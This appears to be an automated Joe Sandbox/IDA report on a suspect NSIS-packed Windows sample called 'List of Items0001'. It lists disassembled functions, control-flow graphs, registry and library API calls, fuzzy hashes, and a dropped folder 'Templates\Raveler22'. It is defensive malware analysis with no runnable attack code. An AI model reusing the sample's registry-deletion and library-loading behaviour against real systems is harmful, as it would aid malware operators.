                                                control_flow_graph 709 402ea9-402ed2 call 4064d5 711 402ed7-402edb 709->711 712 402ee1-402ee5 711->712 713 402f8c-402f90 711->713 714 402ee7-402f08 RegEnumValueW 712->714 715 402f0a-402f1d 712->715 714->715 716 402f71-402f7f RegCloseKey 714->716 717 402f46-402f4d RegEnumKeyW 715->717 716->713 718 402f1f-402f21 717->718 719 402f4f-402f61 RegCloseKey call 406a35 717->719 718->716 720 402f23-402f37 call 402ea9 718->720 725 402f81-402f87 719->725 726 402f63-402f6f RegDeleteKeyW 719->726 720->719 727 402f39-402f45 720->727 725->713 726->713 727->717
                                                APIs
                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                Function 6DB61817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 728 6db61817-6db61856 call 6db61bff 732 6db61976-6db61978 728->732 733 6db6185c-6db61860 728->733 734 6db61862-6db61868 call 6db6243e 733->734 735 6db61869-6db61876 call 6db62480 733->735 734->735 740 6db618a6-6db618ad 735->740 741 6db61878-6db6187d 735->741 742 6db618af-6db618cb call 6db62655 call 6db61654 call 6db61312 GlobalFree 740->742 743 6db618cd-6db618d1 740->743 744 6db6187f-6db61880 741->744 745 6db61898-6db6189b 741->745 769 6db61925-6db61929 742->769 746 6db618d3-6db6191c call 6db61666 call 6db62655 743->746 747 6db6191e-6db61924 call 6db62655 743->747 750 6db61882-6db61883 744->750 751 6db61888-6db61889 call 6db62b98 744->751 745->740 748 6db6189d-6db6189e call 6db62e23 745->748 746->769 747->769 763 6db618a3 748->763 752 6db61885-6db61886 750->752 753 6db61890-6db61896 call 6db62810 750->753 760 6db6188e 751->760 752->740 752->751 768 6db618a5 753->768 760->763 763->768 768->740 772 6db61966-6db6196d 769->772 773 6db6192b-6db61939 call 6db62618 769->773 772->732 775 6db6196f-6db61970 GlobalFree 772->775 778 6db61951-6db61958 773->778 779 6db6193b-6db6193e 773->779 775->732 778->772 781 6db6195a-6db61965 call 6db615dd 778->781 779->778 780 6db61940-6db61948 779->780 780->778 782 6db6194a-6db6194b FreeLibrary 780->782 781->772 782->778
                                                APIs
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E74
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E79
                                                  • Part of subcall function 6DB61BFF: GlobalFree.KERNEL32(?), ref: 6DB61E7E
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB618C5
                                                • FreeLibrary.KERNEL32(?), ref: 6DB6194B
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61970
                                                  • Part of subcall function 6DB6243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6DB6246F
                                                  • Part of subcall function 6DB62810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6DB61896,00000000), ref: 6DB628E0
                                                  • Part of subcall function 6DB61666: wsprintfW.USER32 ref: 6DB61694
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: 5236265c922e29f59221e13cf4f3267e20e61e5548d2ed8f93ac2eade803d05c
                                                • Instruction ID: 3e777326bcaec71c345d4ea27841f6a165c938b12db26962cd6e77de916a5c2a
                                                • Opcode Fuzzy Hash: 5236265c922e29f59221e13cf4f3267e20e61e5548d2ed8f93ac2eade803d05c
                                                • Instruction Fuzzy Hash: 3F41A4718042C29BEF119F24D888BA937A8FF06394F0D4579EB55AA0CEDB74C085C7B0
                                                Function 004020D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 785 4020d8-4020e4 786 4021a3-4021a5 785->786 787 4020ea-402100 call 402da6 * 2 785->787 789 4022f1-4022f6 call 401423 786->789 797 402110-40211f LoadLibraryExW 787->797 798 402102-40210e GetModuleHandleW 787->798 795 402c2a-402c39 789->795 796 40292e-402935 789->796 796->795 800 402121-402130 call 406aa4 797->800 801 40219c-40219e 797->801 798->797 798->800 805 402132-402138 800->805 806 40216b-402170 call 4056ca 800->806 801->789 808 402151-402164 call 6db61817 805->808 809 40213a-402146 call 401423 805->809 810 402175-402178 806->810 812 402166-402169 808->812 809->810 818 402148-40214f 809->818 810->795 813 40217e-402188 call 403cb7 810->813 812->810 813->795 819 40218e-402197 FreeLibrary 813->819 818->810 819->795
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID: ^
                                                • API String ID: 334405425-4142473408
                                                • Opcode ID: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                • Opcode Fuzzy Hash: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000023,00000011,00000002), ref: 004024D5
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 00402515
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsnB66F.tmp,00000000,00000011,00000002), ref: 004025FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp
                                                • API String ID: 2655323295-2763165107
                                                • Opcode ID: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                • Opcode Fuzzy Hash: ccbced7c383fe36513b27ab0f3831983de96ef15fa0590e398bf5cccbf7e4235
                                                • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                Function 0040603F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00405FF0
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00406098
                                                • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0), ref: 004060A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: 4iv.iv$P_B
                                                • API String ID: 3248276644-1145220235
                                                • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004061A5
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3756726018
                                                • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50, 4iv.iv,?,76692EE0,00405D94,?,76693420,76692EE0,00000000), ref: 00405FF0
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                  • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Raveler22
                                                • API String ID: 1892508949-1275126094
                                                • Opcode ID: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                • Opcode Fuzzy Hash: ff9909915b16c23767ee925164981e8f632181fd0fe0b495a8c7e415af322c96
                                                • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048355681.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.674048000446.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048065173.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.674048108309.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
